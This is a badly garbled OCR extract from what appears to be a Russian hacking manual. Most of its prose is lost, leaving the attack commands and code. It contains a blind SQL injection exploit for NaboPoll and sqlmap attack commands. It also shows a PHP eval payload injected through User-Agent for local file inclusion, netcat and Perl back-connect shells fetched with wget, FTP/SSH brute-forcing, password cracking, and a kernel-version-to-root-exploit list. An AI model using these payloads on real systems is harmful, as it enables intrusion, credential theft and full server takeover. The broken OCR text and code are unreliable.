/**/AND/**/l-(SELECT/**/(IF((ASC11(SUBSTRING(user().1 .1 ))>125).1.0)))
S Q L -
NaboPoll. .
(/**/), , .
- SELECT AND
1, SELECT IF.
IF (1),
, (0), . ,
I , AND 1=1,
( ). ,
AND 1*0, ,
survey not found ( ). IF
: A S C II- M y S Q L (

/ 1 I1

vhmihm |||)' j hitiihiui ( / .. -

111041 /- (

, /ihinti ,nti

(|1 / I), I, /tllhlHH IIIWHO.

mmmmr
!0

[. jpjjf | 4

i{

\. ; /,
*
#
.I
>> 14 f/Mfi

$(L $1 -|

mm
W Bmm

W/

iHll.iihiili/iritiI'tliiiii/h1111tili

iiltS;/1ilHiU'1!/j:,/,/</.'

!/'.'1
'

* Q2/n*to9potl/r*&tMpbp?WW"I

f t 81

-pse

lj
(! 1

'/^!
|1
0%(0)

HWW$Jr
4

0%(0)

1
!

0%(0)

0%(0)

Volt*#! 0

AffcWH |

AfttWif ^
1/( (J

buck
fiM/ictK'iby
'IA1
M
&J/

'^

1*

\[

07/2 NaboPoll
/wuftphp Konqueror

p i

^
^ ' (}.
IfIII ^ - \

181
1
I'I
> :ffi

% not; found

*
I
0

.1

0 1 / NaboPoll

'"j*"",

rn

SQL- NaboPoll

77

, , , 100,
( ).
, , 114. .
( SUBSTRING
2):
/**/AND/**/I(SELECT/**/( IF((ASCII(SUBSTRING(user(),2 .1 )> 1 1 4 ).1 .0 )))

, 111
( ).
, http: / /
packetstormsecurity.org/0702-exploits/nabopol 1 -sql .txt
. , (
<?), , (
, . 07.4). Ssurvey 1,
Spath :
/webexploi tati on_package_02/nabopol1

ideation

dit

yiew

(bookmarks

loots

Settings

|||| j ;.|| i { j0 l
\ Location.

Window

Help

http //packetstorm&ecurity org/0702-exploits/nabopoll-sqt.txt

<7
# Nabopoll Blind SQL In je ctio n Exploit
I# Download: w w w .nabocorp.coa/nabopoll/
M coded by sQcratex
# Contact: sO cratex#hotw il, com

. /I

e rror^repo rting fO );
in i_s e t ( "m ax^executlon^tim e", 0) |
/ / ju s t change the default v a l u e s ...
$ 5 rv "lo c a lh o s t "; fpath * " / p o l l " ; $port 80;
^survey " 8 M{ //y o u can verify the number entering in the s ite and viewing the results.

IS;

Cho "*=****1 *'W


/.IMI/mmmruJWk/m/tM nasavvennne\ " /

echo "Nabopoll 501 In jectio n - Proof of Concept Exploit\ n";


echo ................................................................................................... Vn\n*;
echo m mm MySQL User:
1 ; fuser p ||
|while( ?s ir s t r ( f u s e r .c h r (Q ))) {
f r ( $ x 0 ; $x<25 5 ; $X*4-} {
$xpl
,7result.php?surv'w" .fs u rv e y ,
SE LE C T /**/(IF ((A S C II(S U B 5T R IN G (u se r() , * ,$J . * , 1 ) ) * * $ * *), 1 . 0 } )\JA
fenx * fsock op en ($srv,$p ort);
fw rite($cnx ."0E T " ,$p ath.$xp l ," H T T P /I.0\\\*);
jwhile( !fe o f($ c n x ) ){ if( *reg( "power" , f gets ( $ c n x ) ) X f u s e r . c h r (f x ) ; echo c h r (f x ); break; > }*
fclose(fcnx) \
i f (fx2S5J |
die(*\n Try a g a i n . . . " ) ;

>
>
mW%.
>

echo "\n"$

m
I

I
UP

With

I
I
1,
IA h
iI
i
li

. 07.4. NaboPoll
nabopol 1. php, , /tmp
php nabopol 1. php.

78

07. SQL-

,
M y S Q L (. 07.5).

b t tiBp I php nabo p p ll.p h p


N abepo ll

' *,* P ro o f o f C o n c a t E x p lo it

C"i;. % /t.;JIfi.e
r \
\. /
I f'-S T
1 '
. 0 7 .5 . NaboPoll
, , M y S Q L root@l 1host.
, S Q L -
: 0 255.
( , ),
.
, , , , ,
. .
,
load_file(), ,
, /etc/passwd.
user () :
1oad_fi1(0x2f6574632f706173737764)
. 07.6.
,
,
.
, 100 195 .
,
100 15 , 13 .
6.
MD5-X3iua,
(
, ,
). 0-9 a-f.
.
-
8.

Mb IUMd I *1 NtJAdMUJMd

f
. 07.6. NaboPoll



site.com
news. php. , sql , 5 .
.
sqlmap,
:
./sqlmap. -u "http://site.com/news.php?id=12" - id
- " ,/txt/user-agents.txt" -vl --string "Posted 3-3-2008" -e "(
SELECT concat(username.0x3a.password) from users where userid=2)"
- , , -
, ( id). -
(
user-agent = sqlmap, ). -vl
. 11 --string ,
, . , 1=1
1-2 ,
. - , ,
, SELECT .
sqlmap 5 ,
. sqlmap
(), mysql5,
. -,

07. SQL-

80

( mysql4
):
./sqlmap. -u "http://site.com/news.php?id=12 -p id
-a ",/txt/user-agents.txt" -vl --string "Posted 3-3-2008" -e "(
SELECT concat(table_schema.0x3a.table_name.0x3a.columnjiame) from
information_schema.columns where columnjiame like 0x257061737325
limit 0,1)"
sqlmap ,
magic quotes,
0x257061737325 ( ' %pass% *,
).
1imit, . ,
sqlmap ,
.


, S Q L -,
. ,
: Warning: mysql_num_rows(): supplied argument is not a valid M y S Q L
result resource in /home/site/public_html/detail.php on line 377,
, . ( ,
, id) id=29 and 1=1,
, id=29 and 1=2,
.
( 29)
,
.
Google, :
Warning: mysql_num_rows(): supplied argument is not a valid M y S Q L result
resource.
site:fr,site:uk> . .
, S Q L - ,
. , ,
select , ,
. ,
.
,
, /etc/passwd:
id=29 and 1=(SELECT/**/ (IF((ASCII(SUBSTRING(
1oad_fi 1e(0x2f6574632f706173737764).1.1))<=255),1.0)))

81

( ),
,
.
NaboPoll, (
, 6).
( 9 0 % ),
,
. userO, databaseO,
version() @@version_compi le_os.
, .



, , ,
,
.
, , SELECT,
INSERT ( ) UPDATE ( )
?
, , ,
. M y S Q L benchmark(),
PostgreSQL pg_sleep(), M S S Q L delayO.
benchmark()
- .
- ,
. ,
. ,
sql-:
INSERT INTO table VALUES ( 'aaa', 'bbb', ' [sql]'. 'xxx');
table aaa , 'bbb', 'sql' ' '.
sql ,
sql-. select
( ):
INSERT INTO table VALUES ('aaa'. 'bbb', '[ ' OR l=if(ascii(lower(substring(
(select user from mysql.user limit 1),1,1)>0, benchmark
999999,md5(now())),1), 'h a c k e d ')/*]'. 'xxx'):

if, , ,
benchmark, -1.
select
mysql .user, ,

82

07. SQL-

, A S C II-, 0.
, benchmark
( benchmark 999 999 M D 5 -X 3 in
). ,
(/*), hacked.
,
255:
INSERT INTO table VALUES ('aaa', bbb'. '[
' OR l=if(ascii(lower(substring((
select user from mysql.user limit 1),1.1)>255, benchmark(
999999,md5(now())).l) ). hacked ) /* ] . 'xxx'):
,
, .
,
. !
,
, ,
.
benchmark
:
benchmark .
.
.
32- .
.
benchmark ( 999 999)
.
.
benchmark ,
50
.
, .

/proc/self/environ
, ( http://site.com ) php-,
.
, /
, Apache , /tmp
. ?
.
/proc/self/environ.
- , . *nix /, //

self ,
.
- //sel f/environ,
. ,
Apache, /proc/self/environ.
user agent ( -).
/proc/self/environ, user-agent, :

PATH-/sb1n:/usr/sb1n:/b1n:/usr/b1n:/usr/XllR6/b1n:/usr/b1n:/bin
SERVER_A0MIN-admin@s1te.com

Moz111 /5.0 (Windows: U; Windows NT 5.1: en-US: rv:1.9.0.4)


Gecko/2008102920 F1refox/3.0.4 HTTP_KEEP_ALIVE-150
user-agent; <?php eval ($_GET[cmd]) ; ?>
curl:

curl "http://s1te.com/1ndex.php7page-../../../../../../../..//
self/env1ron&cmd-php1nfo();" - "User-Agent: <?php eval(\$_GET[cmd]): ?>"
php1nfo() . /proc/self/environ
user-agent :

84

08. -

PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/XllR6/bin:/usr/bin:/bin
SERVERADMI N=admi n@site.com
<?php evaK$_GET[cmd]); ?> HTTP_KEEP_AIIVE-150

, user-agent
( //self/environ
).

Apache
accessjog errorJog? ,
, . /
Apache.
:
id :
/proc/X{PID}/fd/*{FD_ID}

{PID} ( , /
proc/self/status), %{FD_ID} ( 2
7 Apache).
:
h t t p : / / s i t e . c o m / i n d e x . p h p 7 p a g e . ./proc/self/status

, {PID} 1228,
:
curl "http://site.com/index.php?page=.. / . . / . . / . . / . . / . . / . . / . .//
1228/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]): ?>"

, id , sel f:
curl "h t t p : / / s i t e . c o m / i n d e x . p h p ? p a g e - . .//
self/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$J3ET[cmdl); ?>"

, self ,
id . (
Apache)
.


,
. ,
Secteam
.

85

-
, - . .
. *nix .
e-mail :
1. - .
2. - (, ),

, php-, .
3. wwwrun@l 1host,
wwwrun , http- (
www-data, nobody, www, apache, wwwdata . .).
/ var/mai 1 ( /var/spool /mai 1)
, http-.
curl:
curl "http://s1te.com/1ndex.php7page-.. / . . / . . / . . / . . / . . / . . / . ./var/mai1/
wwwrun&cmd-php1nfo();"

,
, ( -
).

CRLf

<'Ml.I1 ii.y./i
\A\\ vau Y'umiMin n., , ,
^ l1\,
' >w |>;:
(00||0|{ -AvIiDiiV'5 | \
fSOilOiiS* 4 | | * p i i ! t

I Ini * i MiMin t ' (*

Alex)

< I /1 I* |14 v't \> (*0)

11 (:11

|)1)1(.00;90;1 vVlwm4 , lapochka!


|; ty/iMiMo ijuuVi * ' :
II80 i>1>1|
\\ I
EOOil0i4O3 AporhU4 !^**? AdftlfO
*-

100iiO hi j -Aijmii^

IT

Upochkil

IS ( !)|)n ikhwx \\wi\. (, FlyLinkDC++)


/\ihfi < -mi ohmwwiw tQa Mifiimm ( hi 1 1nlti ( Codehunter aka Born
I ):)

III
?

.
.
.
0D.
.
OF.
10.
11.
12.
13. -


( ). ? ,

(root).
, ,
0 D
-. , -,
-, 05.
, ,
netcat ( ).
Unix ( Linux). ,
-,
( ),
D V L .

netcat :
-1 - -v - 25
- (25),
.
. -v (verbose )
-vv (very verbose ).
netcat :
- /bin/sh

1_ 25

(back connect)
. ,
/bin/sh. IP- 127.0.0.1,
:
- /bin/sh

127.0.0.1 25

,
(connect), ,

11

89

<1 f jjjj y/i;i./ji'if(io|i . M , netcat


/1'1 I j /I *

in i mi /i . i n/ ( i , v 0 0 1 1 | :

I , i inliiiiii unli t/ Mii.i I lo iii(Oi,i , ,


in - nh.i ,ii /< ncl.cal. .
I hit ,. | Dam n Vulnerable Linux /III | ,' inii ii , 0 .I .
( /.;./!en;i ).

0 W-

I TVV ?

on (my) ft in
m m i h tffl b, fm H i M l
ifi

0rowps*98(nobody),99(nogreap)

* I

uwv

mset fefe w H

i owr ?

1686 1386 GNU/Linux

|# OA i I // ^ ^ netcat
I *
fff

ff

-
/

i< Enter

/
I

( I )

..

)# I / I/ ;ii. ^ 25.
||1

.;\\ i nter. . ,, ;;;>-t~ ';;/, , ,

},* ^
, , ,..-

*0

,
nobody.

netcat:
- //sh

127.0.0.1

25

11 Enter .
:
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1]
, netcat (

) netcat (
).
id , ,
nobody,
root. uname - .
- exit
Ctrl+C.
, - netcat
-?
,
; -

(back connect shell), Google, back connect


shell download. ,
( ),
,
. , -
.
backconnect.txt. ( ,
!) ,
, wget :
wget -0 /tmp/bc.pl http://mypage.narod.ru/backconnect.txt
-0 (
, *-, Windows,
).
/tmp be. pi.
curl ftp. curl :
curl - /tmp/bc.pl http://mypage.narod.ru/backconnect.txt
,
:
chmod 755 /tmp/bc.pl
, /tmp/bc.pl
: IP - , ,
. :
/tmp/bc.pl 127.0.0.1 25

91

- Perl,
. http:/ /
otaku-studios.com/showthread.php/72978-Perl -Backconnect
. :
#!/usr/b1n/perl
use 10::Socket:
Ssystem
- /bin/bash';
$ARGC-@ARGV:
print "IHS BACK-CONNECT BACKD00R\n\n ;
1f ($ARGC!-2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket:
use F1leHandle:
socket(SOCKET, PF_INET, S0CK_STREAM, getprotobyname(tcp )) or die print "[-] Unable
to Resolve Host\n";
connect(SOCKET, sockaddr_1n($ARGV[l], inet_aton($ARGV[0]))) or die print "[-] Unable
to Connect Host\n";
print "[*] Resolving HostName\n":
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
S0CKET->autof1ush();
open(STDIN. ">&S0CKET");
open(STDOUT,">&S0CKET");
open(STDERR,">&S0CKET");
print "IHS BACK-CONNECT BACKDOOR \n\n";
system("unset HISTFILE: unset SAVEHIST:echo -- Systeminfo --: uname -a:echo:
echo
User info --; 1d; echo: echo -- Directory---; pwd:echo: echo -- Shell -system($system):
#E0F
Kate, ,
( ) /tmp
bc.pl.
, .
, , su nobody.
, .
:
chmod 755 /tmp/bc.pl
, , (
Enter):
nc -1 -n -vv - 25
:
/tmp/bc.pl 127.0.0.1

25

. * tyna

92

* nt

v y

lUUtUftfl tMj

^ >5

uwwmt to 1 0.01 trei | 1W,.)


m

oack cqnwct m

SyttVUnfftM*

u tt j e,-aT ^suce'NOsw #i set

iliittii

i m M i 1 m /i m %

gitMWnogmip) a m ^ M t n o M y )
Directory**

/root

E>t cot $ /tip/be,pi m , 0,0,1 as


IHS BACK-CONNECT BACKDOOR
t*l ftso\ving HOStNiit
N Conflicting.., , 0,0,1
(*) Spinning ShoW

* ) Connoctid to rnot heat

%. Jm ..

.
/ i

u i >>< .<

. 0.2. IMS BeckrConnect


(. 0.2).
, -
(uname

1] pwcl)

|<:y.;ii,i,;rr , 1 1

unset HISTFILE
unset SAVFHIST
. /
(|>

.bash^history.

, , .
, , ,

(backdoor

, , ). ,

, ,
. 11 ,
.
11

tiup :;(icky ,

vlt w\rw\rwl . )

93

. - (
root) ,
drwxrwxrwx. find:
find / -type d -perm -0777 -print > /tmp/.file &

/tmp/. f i1.

02
/etc/passwd, ().
,
. ( ) (brute force ).
, .
( ), , ,
1-3% , .
/etc/passwd
( )
(
)
u s e r l:u s e r l
u s e r2 :u s e r2
u s e r N :u s e r N

Windows,
Brutus 2 ( http://www.hoobie.net/brutiis).
, - PuTTY ( Windows).
P u T T Y
. ,
,
, P u T T Y (. 0.1). Linux
.
21 (F T P ), 110 (P O P 3
), 23 (telnet), 22 (S S H -
S S H ). , Brutus SSH .
BruteSSH Linux Back Track 4.
P u T T Y SSH .
IP - (Host name (or IP-address))
www.site.com, .

95

I>IIV <
KeeMtttl
1
i.j |

H ill
1
uj W M o w

Mehavioui
1
Selection
CqIqui#
CoweoWofl
Data
PiuHV
1#||(
login
f SSH
Seilal

AIkhM

] |.....

Basic option# for your PuTTV session


ity the destination you to connect to
Haul (or IP address)
www.site.oom

Eort
22)

Connection type:
)
0 I*ln e t O Rlogjn SSH
Load

0 Serial

vs or delete stored session

SaVfd Sessions
Default Settings

Close window on exit:


)Always Never

Load
''-K i * .......... .
j'*''
Saye
i
,
j/ !,'I jieI-le te' -I J

Only on dean exit

Open

Cancel

. O B .l. PuTTY

(22). (Connection type)

SSH. 11 Open ()

. login as:, ,
SSI I .
, .
127.0.0.1. ,
, .
21, 25, 110,
Port, Connection type Raw.
Open, ,
- , ,
.
Brutus (. 0 .2). ,
, ().
, 2 1 ( F T P ). FTP.
root , - ,
, , root

F T P .
I, , , Pass Mode (
) Combo List Combo File
not ; .

96

Brutus example-combo,txt. , Target


. Start.
, (, , ,
) Positive Authentication Results
( ).

* Brutus - ACTi. w^yw.iooWe. net/biotus - (January 2000)


EUe Xools tlelp
Stop

Start

Type -FTP

(127.0.01

Target

Connection Options
Port 121

Connections

I II IM M

10

Timeout

!(!

Use Proxy

10

FTP Option#
Modify sequence !

Try to stay connected for 'Ijnfcmrfe

attempts

Authentication Options
Pass Mode Combo List

Delimiter ]:

Combo File 'example-combo.txt

Browse |

Positive Authentication Results

: Password

Username

| Target

0X
idle. 0 B .2 . Brutus

, .

(Morris and Gram pp).
, 20
.
200. 200
.

( ). Brutus
- words .txt.
-.
(, , , ,
). (,
, , , . .).

97

Pass Mode Word List, User File Pass File ,


, .
Brutus ,
F T P - W indow s.
T Y P S o ft F T P Server. http://soft.mydiv.net/
wi n/files-TYPSoft-FTP-Server.html.
, ftpserv.
. , Setup FTP,
(Language russian), .
Setup Users ( )
midnight 12345 (. .).

wa a a m a m m m
List of Users

Password

Directory Access

I Anonymous

J12345

!q u em p \~

Root Directory
Ic a t e m p C

Disable User A ccount


V irtual Directory Showing
/D /D ire cto r /" = "
Max. of User
per account:
Max. of simultaneous user
per account/per IP:
Time-Out: (Min) [Max.: 600 min)
0 = N o Time Limit

;
|
'V EF
I

fo

Files

r~

New User
Copy User

Rename User

Directory
File for W elcom e Message

D elete User
Save

J%

File for Goodbye Message

Close

. .. TYPSoft FTP Server


Brutus combo.txt,
example-combo.txt,
(midnight: 12345). Brutus,
. 0.4, Start.
F T P ( ).
Main F T P - , Brutus
(. 0 .5).
. , T Y P S o ft F T P Server users.ini
md5-x9um ,
, .

* Brutus p i
File

Tools

Target

(January /0 0 0 )

Help

(127 0.0.1

Start

Type jFTP

Stop

Deer

Connection Options
Port ( 5

Connection*
.

fihi iIiii-------*i|10 :Timeout

i i

Use Proxy

Define

F TP Options
Modify sequence

Try to stay connected for |Q rW te

j attempts

Authentication Options
P
User File

Pass Mode f Combo List

Single User

fusers.txt

Combo File Icom bo.txt

Browse

Defender !
Browse

**

Positive Authentication Results

T Password

Username

Target

FTP

127.0.0.1

12345

midnight

I Positive authentication at 127.0.0.1 w ith U s e r : midnight P assw ord: 12345 (2 attem pt

T /V

. 0B.4. combo.txt. !

[22:50:35]

[2250:35]
[22:50:35]
[22:50:35]

22:50:35]
#22:50:35]
22:50:35]
22:50:35]
1 2 2 5 0 :3 5 ]
922:50:35]
822:50:35]
[2250:35]
[22:50:35]

[67] Connect to 127.0.0.1. Get Username.


[68] Connect to 127.0.0.1. Get Username.
[69] Connect to 127.0.0.1. Get Username.
[70] Connect to 127.0.0.1. Get Username.
[68] Authentication Fail: User ADMIN IP: 127.0.0.1
[71 ] Connect to 127.0.0.1. Get Username
[69] User MIDNIGHT Connected
[69] MIDNIGHT: Current Directory: C:\TEMP\
[70] Authentication Fail: User ADMIN IP: 127.0.0.1
[71] Authentication Fail: User ADMIN IP: 127.0,0.1
[69] Client MIDNIGHT, 127.0.0.1 Disconnected (00:00:00 Min)
[72] Connect to 127.0.0.1. Get Username.
[72] Authentication Fail: User ADMIN IP. 127 .0.0.1

0 Users

. 0B.5. TYPSoft FTP Server

/.

99

FTP.
, F T P -.
, Total Commander
, . Total Commander
( )
.
. ,
(deface ) .
1ndex html index. php i ndex. ol d,
index.html,
- ,
. , ,
, .
, .
F T P
P u T T Y . local host, 21
(Connection type) Raw.
F T P - , (. 0.8).


220 TYPSefc FTP Server 1-10 Heady...
. s s id n ig fc t

|331 Password required for midnight.


[PASS 12345
30 User iBiduiglit logged in.
57 ///" is current directory.
:21 Goodbye

. 0 B .6 . FTP- P uTTY

22,
S SH ( ).
P u T T Y ( Windows), ssh ( Linux).
, /etc/passw d
Tima /b in /b a sh /b in /s h , - /s b in /n o lo g rin
bin/ fa ls e ( ,
). ,
. 21 ( F T P )
, 110 (P O P 3 ), :
Brutus , P O P 3
, FTP.

100

0B.

Brutus -.
Use Proxy Define
-,
(. 0.7). -
, .

Proxy Connection Options


Proxy Type

|SOCKS (v5)

Proxy Address |l27 G~Q.1


Proxy Port

[l080

Proxy Authentication Options


Proxy requires authentication

? OK I

Cancel |

. 0B.7. - Brutus
BruteSSH,
S S H .
Back Track 4 root toor.
:
/etc/init.d/networking start
, startx .
,
. ,
. toor.
/pentest/passwords/brutessh aa.txt.

BackTrack Privilege Escalation PasswordAttacs OnlineAttacs BruteSSH


BruteSSH.
. :
,/brutessh.py -h 127.0.0.1 -u root -d aa.txt
, root,
. 0.8.
Back Track 4 9
, , Hydra Medusa.
, S S H , .
, ,
Xhydra (H y d r a G T K ) . Hydra

m&

W 0t bt: /pentfst/passwords/brutessh i h i l l > BruteSSH


S e ss io n

E d it

V ie w

B o o k m a rk s

S e ttin g s

ro o te b t:

101

H e lp

./ b ru te s s h .p y -h l i ? ;,0 .0 .1 -u ro o t -d a a .t x t

*SSH Brytb.f&rcef V f X 9.2


Coded by Christian Hartorella
*Edge-Security Research
naramies@gmail.cora

************

*
*
*.
.

1.27* 0 -11 'J'- rnaje:


!.; root
ro o t

f Shell
. 0 B .8 . BruteSSH
ro ot@ bt:
Session

Edit

View

Bookmarks

Settings

Help

Ppfe^/-ssh

127- . #. 1 rU''P0'ot 'i'-F

f o b f u s .n e t >

ACCOUNT CHECK:
tfbst* I127.
lete) Password: root (1 of 4 complete) .
ACCOUNT CHECK: tssh] Host: 27.6.0.1 (1 of: 1,
le t g P a s s e d :


ACCOUNT CHECK: lssh] Host: 1 2 7 .0 ,0 .1 {1


I r t . ) Password- a l r t 13 o f 4 o . o t e t e l
-

|
ACCOUNT CHECK: tssfel H o st: 1 2 7 ;# .0 ,1 {
le t e f Password: toor (4 of 4 complete)
F0UHD: 5: | H o st: 127 /0
ro o tf3 b t * #
&
I
rooter.

., .v :
^ I :j

. 0 .9 . Medusa

, .
W in d o w s .
M edusa . 0.9.
.

*-
Unix
John The Ripper (www.openwall .com). .
? -, (,

PC-Linux) /etc/passwd,
. -,
. ,
/etc/shadow. -,
/etc/shadow,
. .
-,
( )
, root.
J T R (John The Ripper -)
Unix- , W indows.
Back Track 4, W indo w s
.
unshadow /etc/passwd /etc/shadow.
/etc/passwd, .
:
unshadow -passwd -shadow > -

root: JhAraBYwfjR3.:0 :0 :root: / : / n/bash


mac:GGCfyAEua5zUc:11001:11001:service-myserver.com - POP: /home/mac: / n/sh
pi richer :ySb4B8nseVzEo: 11002:11002: Pitch: /home/pi ncher: / n/sh
luis:QQ4IBHwrKKVEA:11003:11003:thisserver.com - POP: /home/1u1s: /bin/sh

passwd,

( W indow s john john-mmx)

^nix-

103

> , Ctrl+C. i it*i John, ( ).


10 .
,

John - restore
' I ,

JMhn

Shv>N passwd

john.pot,
.
, ,
.
john single (
). .
,
/etc/passwd: ,
, . ,
, ,
ced, s, .
.
john :
John --single users.txt
users.txt .
pincher pitched.
.
: password. 1st.
:
john --wordlist-password.lst users.txt
, ,
--rules:
john --rules --wordlist-password.lst users.txt
,
.
,
, . ,
, .
richard, luis. ,

:
john --incremental:alnum users.txt
alnum ( ).
( --i ncrementa 1) all (--1ncremental: 11),

104

, )#</*
!! (<),
(alpha). & 113 /.
, * , ?

titanic.
.
(-) (
).
--users-[-]LOGIN|UID[,..]

.
--groups-[-JGID[,..]
( )
,
--shells-[-]SHELL[,..]

|6
()].
I Tnlx (
D E S ). 2 sail (),
, ,
, , S o laris
( SunOS).
( Linux I're ellS D )
D E S , (' 111
, , ;>
FreeBSD Linux M D 5 .
$1, JT K F r e e H S I) 1 )5
hash. Linux , 11
, lllowl'ish \2,
John The Ripper
.
,
(John i ),
U b u n tu Linux (B a c k Track 4 )
SHA-512, $, John , (
FreeHSI) I )5
, .
J T R (
3500 ),
. 1)5 ,

LDAP-

& 1

U n ix -

105

15 ,

8 *.

J1 R U n ix -,
D E S , ,
. , ,
-, Jo hn
,
. ,
, ,
^ , 4-,
.
*- J T R
M ySQL, M S SQ L

Oracle . .

40 .

?
(
15- 20 ) .
.
,
.
,
. , Linux-
3 - , ,
.

LDAP-
L D A P *1-.
root
/etx/passwd /etc/shadow,
L D A P .
. *-
base64.
ldap2pw
John The Ripper ( :: //www. openwal 1. com/1 i sts/john-users/2008/02/12 /1).
, :
I
r // Uh iI iftffPi/
W : // Ui K
o

use stn

use ::$64;
wtiilef > ! --ofv ;

eof since we will hit eof on the

other

chore:

106

$cn I $uid 1 1 ';


while( ) {
# get an object
chomp;
last if /A\s*$/;
# object have blank lines between then
if( Ten: (.+)/ ) {
$cn - $1;
} el si f( / Adn: (.+)/ ) {
$dn - $1;
} el si f( /AuserP\w+:: (.+)/) {
$passw= substr( decode_base64($l). 7);
# assuming {crypt}
} el si f( /Auid: (.+)/) {
$uid - $1;
}
}
print "$uid\:$passw\:\:\:$cn\n" if defined $passw: # only output
if object has password
}
root
ldap search, ldap2pw,
1dap. pw:
ldapsearch -D "<dn for root>" -w xxxxxx -b "<base dn for users> ""
userpassword uid cn | ldap2pw > ldap.pw
ldap.pw John.

MDS-
, , Windows
- MD5Inside,
InsidePro (. 0.1).
4
. ,
. ,
- . InsidePro
PasswordsPro, ,
.
M D C rack
(21 ), http://mdcrack.openwall.
net. .

( C U D ).

. MD5 (World Fastest M D 5 Cracker)
B arsW F (http: //3.14. by/ru/md5). GeForce GT220

05-

m pvvm m

04111|&*4909942?l:
C4cm zcsq9A6F78w 9b
20107*FB977I9AA27A0C995P?6?10
fc0tC&HACS907*&964R071S2D234ft70
9*0040318
27070644Al6091\
iu\i-'
7FCfftfc7QB7A70FAllAS93S572BACBB29
t$$PCtfeQ81F*3D73DB2 \;34l09
9QpFlODtmDP0C4F7054ABD2352932
ft0rtA4A7&B5i;,96 3019;l33AN672CA7
SBQQB39&9QB1D913F61IVU5796A136D
01701399$9772661
ie7fF443*lttOlCCIN0DC2&92F0BBA0
900I8Q963CO24Fe0D6963F7O2eB17F72
B2PC?14C47t7fiE9398F324C02B7F331P
*409240?199504786
9Q33B0B308F247C0C3CaODOC7S48C8B3

J;AE6SS04tU'r,F406SAD
/>
8O4U7BO790F11294A9C27DB6C3?B469

QTast HfYiplv v
Tm G
Qtlitjif
<^1254
|0TstJV
0Test_Ae
;ElTtit^AbC
:0Te*t,ARCD
|0Te*t^AftCOt
tei^ah

Qtes^bc
: abed

; I I T f t f t jibedf
0 T d S t .!

!0-TeisU#
0 Te * tJ$ #
:

I H *1 i

107

^j

..j......._ .....

< Empty >

1
12
123
1234
U*345

a
ab
abc
abed
abode

; 0 n/o

Ipxhml

. 0 .1 . MD5Inside Inside Pro

153 155 ,
35-38 .
183 184 (. .2).

'

h t t p s/ / 3 .1 4 .by/en/md5
l i t t p : / / 3 .1 4 . by/ru/md5

Bai'eWP MDS h4tefo'c' yQ .8


by S u a rye h e vslti M ich*11
GPU(9:

154.28 MHash/eec

CPUO:
CPUls

21 .8 9 HHasb/sec
14.71 MHash/ec

CPU*:

154.26 MHAsh/seo

GPU**:

36 .6 0 HHAsh/soc

Key: -36U~w
fiv e .T o ta l*
183.79 MHash/sec
Hash! 1 b(Do9f H f f i 1 5 9 a ld 6 cb 8 6 f l l M c a
P ro 9 io8 8 : 3 2 .8 4 ETC
0 days 0 hours 26 min 24 sec

. 2. BarlWF

B arsW I* ,
* (,
h ttp://h ash . 1ns1depro.coro/Index,php? lancj^rus).

108


, :
barswf_cuda_x32 -h Ib0e9fd3086d9al59ald6cb86fllb4ca - ~
.
Rainbow Tables ( )
MD5-xanieii, .
. *
.

, root. ,
, , .
ssh - su.
nobody,
.
expect, . 1\
expect (
), bruteforce.exp,
su.
(
&) ,
. ,

su.

* nix-

(root). - privilege escalation, privilege
elevation (, , ).
, () -
. L in u x ,
(kernel) . ,
Linux (, Ubuntu, Fedora Red Mat)
.

D a m n Vulnerable Lin u x.
exploit-db.com.
MilwOrm, ,
. D am n Vulnerable Linux
/pentest/exploits/mi lwOrm Mi IwOrm,
2007 , .
( platforms), (
local remote), ,
( ports). exploit-db.
com , Mi IwOrm.

nobody ( su nobody), . 0 D .1 ,
/tmp ( cd /tmp).
. uname - . ,
Linux 2.6.20. ,
. Google Linux kernel 2.6 local root
exploit ( 2.6 root).
Linux kernel 2.6 Local Privilege Escalation.
exploit-db.com ,
,
, ,
, .

110

0 D .

bt
* su nobody
bt
r o c t $ cd /tup
jbt
% unaae *a
Linux bt 2.6.20*BT PwnSaucei'NG$NP #3 Sat Ftb 24 15;S2:^9 (iff 2007 t i l #
86 GNU/Linux
bt tap $ gcc s ta tic -W
-o ex ex*
bt
tap $ ./ex

1M 6

Linux vasplice Local Root Exploit


By qaaz
[+ ]
1+]
[+ ]
[+ ]
[+ ]

: OxO .. 0x1086
page: 0x6
page: 0x20
: 0x4000
0x5000
page: 0x4000
[*] page: 0x4020
[+1 : 0x1006 . . 0x2000
[+ ] page: 0x1000
M mnap: 0xb7f4a000 .. Oxb7f7cQOO
1+] root
bt tap # id
uid=0(root) gid=0(root) groups=98(nobody),4 4 (rtogroup)
bt tap v |
. O D .l. vmsplfee qaaz

Linux kernel

2 .6 .1 7 2 .6 .2 4 .1 vmsplice Local Root Exploit ( www.


exploit-db.com/exploits/5092 ) . . k i

i i .m( h i

2008

qaaz. joss <i b id naked in my bed (


) ,
. . ,
. 11 . Kate / t.mp X., ,
,
:
wget -0 /tmp/. http://www.exploit-db.com/download/1
.
. (kernel exploits)
-static, .
Linux gcc (>NU Compiler).

( Compiler).

:
gcc -static -W -n - ex ex.
- (

/).

(ex. ) . (. . 0 D .I ) ,
, (warning)
(error) . (

/ /)

, : $

111

#, . id ,
root (uid-).
. !
,
Linux.
2.4.17 newlocal, kmod, uselib24;
2.4.18 brk, brk2, newlocal, kmod;
2.4.19 brk, brk2, newlocal, kmod;
2.4.20 ptrace, kmod, ptrace-kmod, brk, brk2;
2.4.21 brk, brk2, ptrace, ptrace-kmod;
2.4.22 brk, brk2, ptrace, ptrace-kmod;
2.4.22-10 loginx;
2.4.23 mremap_pte;
2.4.24 mremap_pte, uselib24;
2.4.25-1 uselib24;
2.4.27 uselib24;
2.6.2 mremap_pte, krad, hOOlyshit;
2.6.5-2.6.8 krad, krad2, hOOlyshit;
2.6.8-5 krad2, hOOlyshit;
2.6.9 krad, krad2, hOOlyshit;
2.6.9-34 rOOt, hOOlyshit;
2.6.10 krad, krad2, hOOlyshit;
2.6.13-2.6.16 raptor, raptor2, hOllyshit, prctl;
2.6.17-2.6.24.1 vmsplice;
2.6-2.6.19 (32bit) - ip_append_data() 0x82-CVE-2009-2698;
2.6.30 + /SE Lin ux/R H E L 5 Test Kernel Local Root Exploit Oday;
2.6.31 perf_counter (x64);
2.6.1-2.6.32-rc5 Pipe.c.
- -
